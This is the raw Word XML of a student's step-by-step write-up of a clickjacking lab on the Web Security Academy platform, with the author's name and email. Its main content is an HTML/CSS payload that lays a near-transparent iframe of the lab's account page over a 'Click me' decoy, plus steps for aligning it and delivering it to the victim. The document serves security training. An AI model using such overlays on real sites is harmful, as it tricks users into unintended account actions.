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BB8B" w14:textId="0FBA3DCC" w:rsidR="00632FB4" w:rsidRDefault="009A6B19">
      <w:r>
        <w:t>Name :- Aakash Singh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408D4B7A" w14:textId="66CE1BF9" w:rsidR="009A6B19" w:rsidRDefault="009A6B19">
      <w:r>
        <w:t>Email:-aakashsinghrajput8610@gmail.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79BC3753" w14:textId="4D627055" w:rsidR="009A6B19" w:rsidRDefault="009A6B19">
      <w:r>
        <w:t xml:space="preserve">ClickJacking </w:t>
      </w:r>
      <w:r w:rsidR="00DA0B1A">
        <w:t xml:space="preserve"> Lab-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E0D758" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="00751995"/>
    <w:p w14:paraId="4C7C59DB" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="00751995"/>
    <w:p w14:paraId="0601687F" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="00751995"/>
    <w:p w14:paraId="03671A30" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="00751995"/>
    <w:p w14:paraId="32FD7004" w14:textId="7F127D8A" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step1:- </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FBF1D86" w14:textId="77777777" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00751995">
        <w:t>Log in to the target application using valid credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA39D68" w14:textId="67990ECF" w:rsidR="00751995" w:rsidRDefault="009A6B19">
      <w:r w:rsidRPr="009A6B19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="75DA1481" wp14:editId="6D418C5F">
            <wp:extent cx="5943600" cy="3028950"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="172704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43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3596" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="0519A535" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="169CF3CB" w14:textId="77777777" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Step2:- </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prepare Exploit Page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E416ACB" w14:textId="77777777" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve">Go to the </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploit Server</w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve"> and paste the following HTML into the </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve"> section:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DD0A87" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t>&lt;style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E99FE1" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">    iframe {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA7557B" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        position:relative;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508701E3" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        width: 500px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66602FC3" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        height: 700px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="131544ED" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        opacity: 0.1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3201FFF4" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        z-index: 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11C514E7" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BF8C8D" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">    div {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7FE49F" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        position:absolute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48729B13" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        top: 550px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB416A5" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        left: 60px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD5A39C" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">        z-index: 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F298A0" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D5FCD5" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t>&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D512E87" w14:textId="77777777" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t>&lt;div&gt;Click me&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F389E7C" w14:textId="3E72BEE5" w:rsidR="00751995" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r>
        <w:t>&lt;iframe src="https://0ace00710482da918007039a0038001f.web-security-academy.net/my-account"&gt;&lt;/iframe&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A83CF" w14:textId="60B4E7A7" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:r w:rsidRPr="009A6B19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1727EAFB" wp14:editId="110F02F5">
            <wp:extent cx="5943600" cy="3063875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:docPr id="61370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06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382C" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="589D1D28" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="72358644" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="0D26423D" w14:textId="77777777" w:rsidR="00751995" w:rsidRDefault="00751995"/>
    <w:p w14:paraId="35048F23" w14:textId="64933B79" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Step3:-</w:t>
      </w:r>
      <w:r w:rsidRPr="00751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751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Align the Click Area</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF401F7" w14:textId="77777777" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Store</w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve"> → </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>View Exploit</w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFC28D0" w14:textId="77777777" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve">Hover over </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>“Test me”</w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D894EBF" w14:textId="3DEBE64D" w:rsidR="00751995" w:rsidRDefault="00751995" w:rsidP="00751995">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve">Ensure cursor becomes a pointer (means alignment is correct) </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F80CF9B" w14:textId="29FA945E" w:rsidR="009A6B19" w:rsidRDefault="009A6B19" w:rsidP="009A6B19">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="009A6B19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D1A9499" wp14:editId="2CADD930">
            <wp:extent cx="5943600" cy="2441966"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="183532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6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4484" cy="245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3D63" w14:textId="3E1579FB" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="009A6B19" w:rsidP="00751995">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4: -</w:t>
      </w:r>
      <w:r w:rsidR="00751995" w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Deliver Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608BA2AF" w14:textId="1C72D977" w:rsidR="00751995" w:rsidRPr="00751995" w:rsidRDefault="00751995" w:rsidP="009A6B19">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00751995">
        <w:t xml:space="preserve">Click </w:t>
      </w:r>
      <w:r w:rsidRPr="00751995">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Store</w:t>
      </w:r>
      <w:r w:rsidR="009A6B19">
        <w:t xml:space="preserve"> and deliver to Victim So, the Lab solved successfully</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A2364B" w14:textId="589CE09B" w:rsidR="00751995" w:rsidRDefault="009A6B19">
      <w:r w:rsidRPr="009A6B19">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="15617C8B" wp14:editId="0BF475C6">
            <wp:extent cx="5936226" cy="2743200"/>
            <wp:effectExtent l="0" t="0" r="7620" b="0"/>
            <wp:docPr id="84898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88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7636" cy="281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99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0ADB6" w14:textId="77777777" w:rsidR="00AA6FFC" w:rsidRDefault="00AA6FFC" w:rsidP="009A6B19">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="755A8EF9" w14:textId="77777777" w:rsidR="00AA6FFC" w:rsidRDefault="00AA6FFC" w:rsidP="009A6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5110C" w14:textId="77777777" w:rsidR="00AA6FFC" w:rsidRDefault="00AA6FFC" w:rsidP="009A6B19">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="3A4812EE" w14:textId="77777777" w:rsidR="00AA6FFC" w:rsidRDefault="00AA6FFC" w:rsidP="009A6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D1145" w14:textId="7BC7C0DE" w:rsidR="009A6B19" w:rsidRPr="009A6B19" w:rsidRDefault="009A6B19">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
      </w:rPr>
      <w:t xml:space="preserve">                                                            </w:t>
    </w:r>
    <w:r w:rsidRPr="009A6B19">
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:sz w:val="40"/>
        <w:szCs w:val="40"/>
      </w:rPr>
      <w:t xml:space="preserve">ClickJacking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C93"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1B8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9355A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DAC2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308BA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0420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41389"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44E8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D2D90"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="714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C66F3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8F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549895">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="390926663">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1982345664">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1174227573">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="971397629">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="133125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95"/>
    <w:rsid w:val="001B292D"/>
    <w:rsid w:val="004234B4"/>
    <w:rsid w:val="0048587B"/>
    <w:rsid w:val="00632FB4"/>
    <w:rsid w:val="00751995"/>
    <w:rsid w:val="0078544B"/>
    <w:rsid w:val="007E1EA7"/>
    <w:rsid w:val="00920DCD"/>
    <w:rsid w:val="009A6B19"/>
    <w:rsid w:val="00A94331"/>
    <w:rsid w:val="00AA6FFC"/>
    <w:rsid w:val="00B1617E"/>
    <w:rsid w:val="00DA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4C317"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{BE240DA6-32B0-48B2-8DEB-72A27A3B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B19"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="009A6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 rajput</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>vishal singh rajput</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-31T07:22:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-04-02T05:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>